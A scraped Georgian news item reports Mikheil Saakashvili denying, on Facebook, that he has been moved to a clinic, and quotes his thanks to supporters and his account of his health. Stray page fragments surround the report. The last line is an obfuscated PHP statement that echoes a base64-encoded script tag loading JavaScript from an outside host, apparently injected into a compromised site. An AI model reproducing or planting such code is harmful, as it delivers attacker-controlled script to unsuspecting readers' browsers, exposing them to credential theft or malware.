celsiusi
ავერსი საქკაბელი
საქართველოს მესამე პრეზიდენტი მიხეილ სააკაშვილი გავრცელებულ ინფორმაციას მისი კლინიკაში გადაყვანის შესახებ უარყოფს და ციხესთან შეკრებილ გულშემატკივრებს მადლობას უხდის. ამის შესახებ მისი განცხადება სააკაშვილის "ფეისბუქ" გვერდზე რამდენიმე წუთის წინ დაიდო.  
 
"მადლობა ყველას, ვინც ციხესთან მოვიდა. 
მეგობრებო, დღეს არ გადავუყვანივარ. რაც შეეხება ჩემს ჯანმრთელობის მდგომარეობას, ციხის ექიმები ყველანი შეშფოთებულები არიან და ყველა ერთ აზრზეა, რომ აუცილებელია ჩემი დაუყოვნებლივ სტაციონარში გადაყვანა თუნდაც დროებით, სანამ შევძლებ ნამდვილ მკურნალობას, მაგრამ ეს ვერ იქნება ვერც გლდანი და ვერც გორი, სადაც ჩემზე განხორციელდა ფიზიკური და ფსიქოლოგიური ძალადობა, რომელთა შედეგადაც დადგა ჩემი დღევანდელი მდგომარეობა. 
 
ძალიან მადლობელი ვარ საზოგადოების სოლიდარობის, განვიცდი ბათუმში დაკავებებს. ასევე, მადლობელი ვარ საერთაშორისო თანამეგობრობის მორალური მხარდაჭერის. იმედია, ეს ყველაფერი შედეგებს გამოიღებს." – წერს სააკაშვილი.
650
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");